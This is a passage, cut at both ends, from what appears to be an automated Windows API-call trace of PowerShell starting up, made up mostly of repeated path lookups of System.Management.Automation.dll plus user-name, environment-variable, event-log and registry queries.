ftLastAccessTime.dwHighDateTime=0x1d34346, ftLastWriteTime.dwLowDateTime=0x365f3810, ftLastWriteTime.dwHighDateTime=0x1d34346, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0029.964] GetLastError () returned 0xcb [0029.965] SetErrorMode (uMode=0x1) returned 0x1 [0029.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e3d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0029.965] GetLastError () returned 0xcb [0029.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e384, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0029.965] GetLastError () returned 0xcb [0029.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e384, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0029.965] GetLastError () returned 0xcb [0029.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e384, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0029.965] GetLastError () returned 0xcb [0029.996] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0xb5c60, nSize=0x24e928 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x24e928) returned 0x1 [0029.996] GetLastError () returned 0xcb [0029.996] GetUserNameW (in: lpBuffer=0xd2630, pcbBuffer=0x24e930 | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x24e930) returned 1 [0029.997] ReportEventW (hEventLog=0x4390004, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2358444*="Available", lpRawData=0x2358300) returned 1 [0029.997] GetLastError () returned 0x0 [0029.998] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0029.998] GetLastError () returned 0xcb [0029.999] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0029.999] GetLastError () returned 0xcb [0030.003] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e408, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.003] GetLastError () returned 0xcb [0030.003] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e3b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.003] GetLastError () returned 0xcb [0030.003] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e3b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.003] GetLastError () returned 0xcb [0030.006] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e3ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.006] GetLastError () returned 0xcb [0030.006] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e35c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.006] GetLastError () returned 0xcb [0030.006] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e35c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.006] GetLastError () returned 0xcb [0030.006] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0030.006] GetLastError () returned 0xcb [0030.006] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="\\Users\\BGC6u8Oy yXGxkR") returned 0x16 [0030.006] GetLastError () returned 0xcb [0030.006] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e3ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.006] GetLastError () returned 0xcb [0030.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e35c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.013] GetLastError () returned 0xcb [0030.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e35c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.013] GetLastError () returned 0xcb [0030.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e3ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.013] GetLastError () returned 0xcb [0030.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e35c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.013] GetLastError () returned 0xcb [0030.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e35c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.013] GetLastError () returned 0xcb [0030.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e3ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.013] GetLastError () returned 0xcb [0030.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e35c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.013] GetLastError () returned 0xcb [0030.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e35c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.013] GetLastError () returned 0xcb [0030.013] GetCurrentProcessId () returned 0xa68 [0030.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e3ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.014] GetLastError () returned 0xcb [0030.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e35c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.014] GetLastError () returned 0xcb [0030.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e35c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.014] GetLastError () returned 0xcb [0030.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e398, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.014] GetLastError () returned 0xcb [0030.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e348, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.014] GetLastError () returned 0xcb [0030.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e348, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.014] GetLastError () returned 0xcb [0030.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e398, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.014] GetLastError () returned 0xcb [0030.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e348, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.014] GetLastError () returned 0xcb [0030.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e348, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.014] GetLastError () returned 0xcb [0030.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e3ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.014] GetLastError () returned 0xcb [0030.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e35c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.015] GetLastError () returned 0xcb [0030.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e35c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.015] GetLastError () returned 0xcb [0030.015] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e8bc | out: phkResult=0x24e8bc*=0x330) returned 0x0 [0030.015] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e904, lpData=0x0, lpcbData=0x24e900*=0x0 | out: lpType=0x24e904*=0x1, lpData=0x0, lpcbData=0x24e900*=0x56) returned 0x0 [0030.015] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e904, lpData=0xd2630, lpcbData=0x24e900*=0x56 | out: lpType=0x24e904*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24e900*=0x56) returned 0x0 [0030.015] RegCloseKey (hKey=0x330) returned 0x0 [0030.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e3ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.015] GetLastError () returned 0xcb [0030.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e35c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.015] GetLastError () returned 0xcb [0030.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e35c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.015] GetLastError () returned 0xcb [0030.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e394, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.016] GetLastError () returned 0xcb [0030.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e344, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.016] GetLastError () returned 0xcb [0030.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e344, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.016] GetLastError () returned 0xcb [0030.055] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.055] GetLastError () returned 0xcb [0030.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.056] GetLastError () returned 0xcb [0030.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.056] GetLastError () returned 0xcb [0030.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.056] GetLastError () returned 0xcb [0030.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.056] GetLastError () returned 0xcb [0030.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.056] GetLastError () returned 0xcb [0030.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.056] GetLastError () returned 0xcb [0030.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.056] GetLastError () returned 0xcb [0030.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.056] GetLastError () returned 0xcb [0030.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.056] GetLastError () returned 0xcb [0030.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.056] GetLastError () returned 0xcb [0030.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.056] GetLastError () returned 0xcb [0030.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.057] GetLastError () returned 0xcb [0030.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.057] GetLastError () returned 0xcb [0030.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.057] GetLastError () returned 0xcb [0030.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.057] GetLastError () returned 0xcb [0030.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.057] GetLastError () returned 0xcb [0030.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.057] GetLastError () returned 0xcb [0030.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.057] GetLastError () returned 0xcb [0030.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.057] GetLastError () returned 0xcb [0030.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d4, lpFilePart=0x0 | out: 